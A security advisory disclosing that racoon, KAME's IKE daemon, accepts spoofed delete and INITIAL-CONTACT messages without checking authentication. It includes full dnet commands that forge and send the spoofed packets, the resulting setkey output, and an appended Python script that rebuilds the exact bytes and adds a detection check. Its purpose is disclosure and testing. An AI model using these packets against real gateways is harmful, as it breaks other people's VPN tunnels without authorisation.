0 Preface

Now that most bugs in isakmpd that allowed for unauthorized SA deletion are
"fixed", it's time to release some information on racoon.

By the way: about 5 months ago I tried to contact the KAME developers.

1 Description

racoon, KAME's IKE daemon, contains flaws that allow unauthorized deletion of
IPsec (and ISAKMP) SAs.

2 Details

2.1 racoon's "authentication" of delete messages

When racoon receives a delete message carrying the initiator cookie of a
main, aggressive or base mode exchange that has not yet established an ISAKMP
SA, it honours the request, provided the message also contains a (dummy) hash
payload and originates from the expected IP address. The hash is never
verified: the exchange is still at its first message, so there is no keying
material to verify it against, and an empty hash payload (4 bytes of generic
payload header, no data) is accepted. The attacker does not even have to
guess the cookie, since he can create the half-open exchange under a cookie
of his own choosing first (see section 4). See isakmp_main() in isakmp.c and
purge_isakmp_spi(), purge_ipsec_spi(), isakmp_info_recv() and
isakmp_info_recv_d() in isakmp_inf.c for details and amusement.

2.2 INITIAL-CONTACT with racoon

INITIAL-CONTACT notifications are handled almost the same way, except that no
(dummy) hash payload is needed at all, and the effect is far greater: racoon
deletes all IPsec SAs "relatived to the destination address" (sic), i.e.
every SA with the spoofed peer rather than a single SPI. See
isakmp_info_recv_n() and info_recv_initialcontact() in isakmp_inf.c for
additional information.

3 Affected Systems

All versions of racoon are affected.

4 Leveraging the Issues ..

Take a look at http://securityfocus.com/archive/1/348637 for the assumed
scenario. In the examples below two gateways, vpn-gw-a and vpn-gw-b, have a
tunnel between them, and the attacker sends packets to vpn-gw-a with the
source address of vpn-gw-b.

4.1 .. using delete messages

An IPsec tunnel between vpn-gw-a and vpn-gw-b is established:

    vpn-gw-a# setkey -D
    esp mode=tunnel spi=4127562105(0xf6059979) reqid=0(0x00000000)
    [..]
    esp mode=tunnel spi=111058204(0x069e9d1c) reqid=0(0x00000000)
    [..]

The attacker launches step 1 of his attack. He pretends to initiate a phase 1
exchange (with spoofed source IP address, of course), using the initiator
cookie 0x1717171717171717 and a single 3DES/SHA/pre-shared-key/MODP-1024
proposal:

    attacker# dnet hex \
    > "\x17\x17\x17\x17" \
    > "\x17\x17\x17\x17" \
    > "\x00\x00\x00\x00" \
    > "\x00\x00\x00\x00" \
    > "\x01\x10\x02\x00" \
    > "\x00\x00\x00\x00" \
    > "\x00\x00\x00\x48" \
    > "\x00\x00\x00\x2c" \
    > "\x00\x00\x00\x01" \
    > "\x00\x00\x00\x01" \
    > "\x00\x00\x00\x20" \
    > "\x01\x01\x00\x01" \
    > "\x00\x00\x00\x18" \
    > "\x00\x01\x00\x00" \
    > "\x80\x01\x00\x05" \
    > "\x80\x02\x00\x02" \
    > "\x80\x03\x00\x01" \
    > "\x80\x04\x00\x02" | pipe
    pipe> dnet udp sport 500 dport 500 | pipe
    pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a | pipe
    pipe pipe pipe> dnet send

If racoon finds the included proposal acceptable, it creates state for the
half-open exchange under that initiator cookie. Now the attacker carries out
step 2: an informational exchange for the same cookie, consisting of an empty
hash payload and a delete payload for the ESP SPI 0xf6059979:

    attacker# dnet hex \
    > "\x17\x17\x17\x17" \
    > "\x17\x17\x17\x17" \
    > "\x00\x00\x00\x00" \
    > "\x00\x00\x00\x00" \
    > "\x08\x10\x05\x00" \
    > "\x00\x00\x00\x00" \
    > "\x00\x00\x00\x30" \
    > "\x0c\x00\x00\x04" \
    > "\x00\x00\x00\x10" \
    > "\x00\x00\x00\x01" \
    > "\x03\x04\x00\x01" \
    > "\xf6\x05\x99\x79" | pipe
    pipe> dnet udp sport 500 dport 500 | pipe
    pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a | pipe
    pipe pipe pipe> dnet send

It seems that racoon knows the attacker ;-). The SA with SPI 0xf6059979 is
gone:

    vpn-gw-a# setkey -D
    esp mode=tunnel spi=111058204(0x069e9d1c) reqid=0(0x00000000)
    [..]

Note: you can also delete ISAKMP SAs.

4.2 .. using INITIAL-CONTACT

The IPsec tunnel is up and running:

    vpn-gw-a# setkey -D
    esp mode=tunnel spi=785352974(0x2ecf890e) reqid=0(0x00000000)
    [..]
    esp mode=tunnel spi=183367627(0x0aedf7cb) reqid=0(0x00000000)
    [..]

Again the attacker does step 1 and then injects an ISAKMP message like this
one: an informational exchange for the same cookie carrying nothing but an
INITIAL-CONTACT notification (type 0x6002), and no hash payload at all:

    attacker# dnet hex \
    > "\x17\x17\x17\x17" \
    > "\x17\x17\x17\x17" \
    > "\x00\x00\x00\x00" \
    > "\x00\x00\x00\x00" \
    > "\x0b\x10\x05\x00" \
    > "\x00\x00\x00\x00" \
    > "\x00\x00\x00\x28" \
    > "\x00\x00\x00\x0c" \
    > "\x00\x00\x00\x01" \
    > "\x01\x00\x60\x02" | pipe
    pipe> dnet udp sport 500 dport 500 | pipe
    pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a | pipe
    pipe pipe pipe> dnet send

racoon blindly obeys the attacker's command:

    vpn-gw-a# setkey -D
    No SAD entries.

5 Bug fixes

There are no bug fixes.

Thomas Walpuski
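The three messages from sections 4.1 and 4.2, rebuilt and decoded field by field, as an added example that is not part of the advisory, of racoon/KAME or of dnet. It assumes only the byte layouts of RFC 2408 (ISAKMP) and RFC 2407 (IPsec DOI); the cookie 0x17.., the SPI 0xf6059979 and the proposal attributes are the values from the advisory, and the builders are checked against the exact byte strings the advisory feeds to `dnet hex`. unauthenticated_control() is a hypothetical detection check (the name is mine, not racoon's) that flags the two message shapes racoon is shown accepting without a verified hash.

```python
"""Build and decode the ISAKMP messages from sections 4.1 and 4.2.

Added example; not code from the advisory, from KAME/racoon or from dnet.
Layouts follow RFC 2408 / RFC 2407; ADVISORY holds the advisory's own bytes.
"""
import struct

# Payload types (RFC 2408 3.1), exchange types, DOI/protocol identifiers (RFC 2407).
PAYLOAD_NONE, PAYLOAD_SA, PAYLOAD_HASH, PAYLOAD_NOTIFY, PAYLOAD_DELETE = 0, 1, 8, 11, 12
EXCH_MAIN_MODE, EXCH_INFORMATIONAL = 2, 5
DOI_IPSEC, SIT_IDENTITY_ONLY, KEY_IKE = 1, 1, 1
PROTO_ISAKMP, PROTO_ESP = 1, 3
NOTIFY_INITIAL_CONTACT = 0x6002
# Phase 1 attribute classes and the values used in the advisory's proposal.
ATTR_ENC, ATTR_HASH, ATTR_AUTH, ATTR_GROUP = 1, 2, 3, 4
ENC_3DES_CBC, HASH_SHA, AUTH_PSK, GROUP_MODP1024 = 5, 2, 1, 2

ICOOKIE = b"\x17" * 8   # attacker-chosen initiator cookie, reused in every message
RCOOKIE = b"\x00" * 8   # zero: the bogus exchange never gets past its first message

# Exact bytes from the advisory (the `dnet hex` arguments), for comparison.
ADVISORY = {
    "step1": bytes.fromhex("1717171717171717" "0000000000000000" "01100200"
                           "00000000" "00000048" "0000002c" "00000001" "00000001"
                           "00000020" "01010001" "00000018" "00010000" "80010005"
                           "80020002" "80030001" "80040002"),
    "step2": bytes.fromhex("1717171717171717" "0000000000000000" "08100500"
                           "00000000" "00000030" "0c000004" "00000010" "00000001"
                           "03040001" "f6059979"),
    "initial_contact": bytes.fromhex("1717171717171717" "0000000000000000"
                                     "0b100500" "00000000" "00000028" "0000000c"
                                     "00000001" "01006002"),
}

def payload(next_type, body):
    """Generic payload header (RFC 2408 3.2): next payload, reserved, length."""
    return struct.pack("!BBH", next_type, 0, 4 + len(body)) + body

def message(next_type, exch, body):
    """ISAKMP header (RFC 2408 3.1): cookies, next payload, version 1.0,
    exchange type, flags 0, message ID 0, total length."""
    return struct.pack("!8s8sBBBBII", ICOOKIE, RCOOKIE, next_type, 0x10,
                       exch, 0, 0, 28 + len(body)) + body

def attr(cls, value):
    """Basic (TV) data attribute: AF bit set, 16-bit value (RFC 2408 3.3)."""
    return struct.pack("!HH", 0x8000 | cls, value)

def step1_main_mode():
    """Step 1: bogus first main-mode message with one 3DES/SHA/PSK/MODP-1024 transform."""
    transform = payload(PAYLOAD_NONE,
                        struct.pack("!BBH", 0, KEY_IKE, 0)   # transform number 0, as in the advisory
                        + attr(ATTR_ENC, ENC_3DES_CBC) + attr(ATTR_HASH, HASH_SHA)
                        + attr(ATTR_AUTH, AUTH_PSK) + attr(ATTR_GROUP, GROUP_MODP1024))
    proposal = payload(PAYLOAD_NONE, struct.pack("!BBBB", 1, PROTO_ISAKMP, 0, 1) + transform)
    sa = payload(PAYLOAD_NONE, struct.pack("!II", DOI_IPSEC, SIT_IDENTITY_ONLY) + proposal)
    return message(PAYLOAD_SA, EXCH_MAIN_MODE, sa)

def step2_delete(spi, proto=PROTO_ESP):
    """Step 2: informational exchange, empty (dummy) hash, delete for one SPI."""
    dummy_hash = payload(PAYLOAD_DELETE, b"")            # 4 bytes of header, no hash data
    delete = payload(PAYLOAD_NONE, struct.pack("!IBBH", DOI_IPSEC, proto, len(spi), 1) + spi)
    return message(PAYLOAD_HASH, EXCH_INFORMATIONAL, dummy_hash + delete)

def initial_contact():
    """Section 4.2: INITIAL-CONTACT notification with no hash payload at all."""
    notify = payload(PAYLOAD_NONE, struct.pack("!IBBH", DOI_IPSEC, PROTO_ISAKMP, 0,
                                               NOTIFY_INITIAL_CONTACT))
    return message(PAYLOAD_NOTIFY, EXCH_INFORMATIONAL, notify)

def decode(pkt):
    """Walk the top-level payload chain and pull out what a receiver would act on."""
    icookie, rcookie, nxt, _ver, exch, _flags, _msgid, length = struct.unpack("!8s8sBBBBII", pkt[:28])
    if length != len(pkt):
        raise ValueError("ISAKMP length field does not match packet size")
    info = {"icookie": icookie, "rcookie": rcookie, "exchange": exch,
            "payloads": [], "hash_len": None, "delete": [], "notify": None}
    off = 28
    while nxt != PAYLOAD_NONE:
        ptype = nxt
        nxt, _, plen = struct.unpack("!BBH", pkt[off:off + 4])
        if plen < 4 or off + plen > length:
            raise ValueError("bad payload length at offset %d" % off)
        body = pkt[off + 4:off + plen]
        info["payloads"].append(ptype)
        if ptype == PAYLOAD_HASH:
            info["hash_len"] = len(body)
        elif ptype in (PAYLOAD_DELETE, PAYLOAD_NOTIFY):
            if len(body) < 8:
                raise ValueError("delete/notify payload truncated")
            _doi, proto, spi_size, last = struct.unpack("!IBBH", body[:8])
            if ptype == PAYLOAD_DELETE:          # `last` is the number of SPIs
                if len(body) < 8 + last * spi_size:
                    raise ValueError("delete payload truncated")
                spis = [body[8 + i * spi_size:8 + (i + 1) * spi_size] for i in range(last)]
                info["delete"].append((proto, spis))
            else:                                # `last` is the notify message type
                info["notify"] = (proto, last)
        off += plen
    return info

def unauthenticated_control(pkt):
    """Hypothetical check: True for an informational exchange that removes SAs
    (delete payload or INITIAL-CONTACT) while carrying no hash payload or an
    empty one, the two shapes racoon accepts without any proof of identity."""
    d = decode(pkt)
    if d["exchange"] != EXCH_INFORMATIONAL:
        return False
    acts = bool(d["delete"]) or d["notify"] == (PROTO_ISAKMP, NOTIFY_INITIAL_CONTACT)
    return acts and not d["hash_len"]

if __name__ == "__main__":
    built = {"step1": step1_main_mode(), "step2": step2_delete(bytes.fromhex("f6059979")),
             "initial_contact": initial_contact()}
    for name, pkt in built.items():
        assert pkt == ADVISORY[name], name
        print(name, "matches advisory bytes; unauthenticated control:", unauthenticated_control(pkt))
```

Running the script reproduces the advisory's three byte strings exactly and prints the check result for each. Decoding step 2 and the INITIAL-CONTACT message shows that the only things tying them to the existing tunnel are the initiator cookie and the (spoofed) source address, which is precisely what sections 2.1 and 2.2 describe; the script itself sends nothing, so to test a racoon build write the bytes out and send them with dnet as in the advisory.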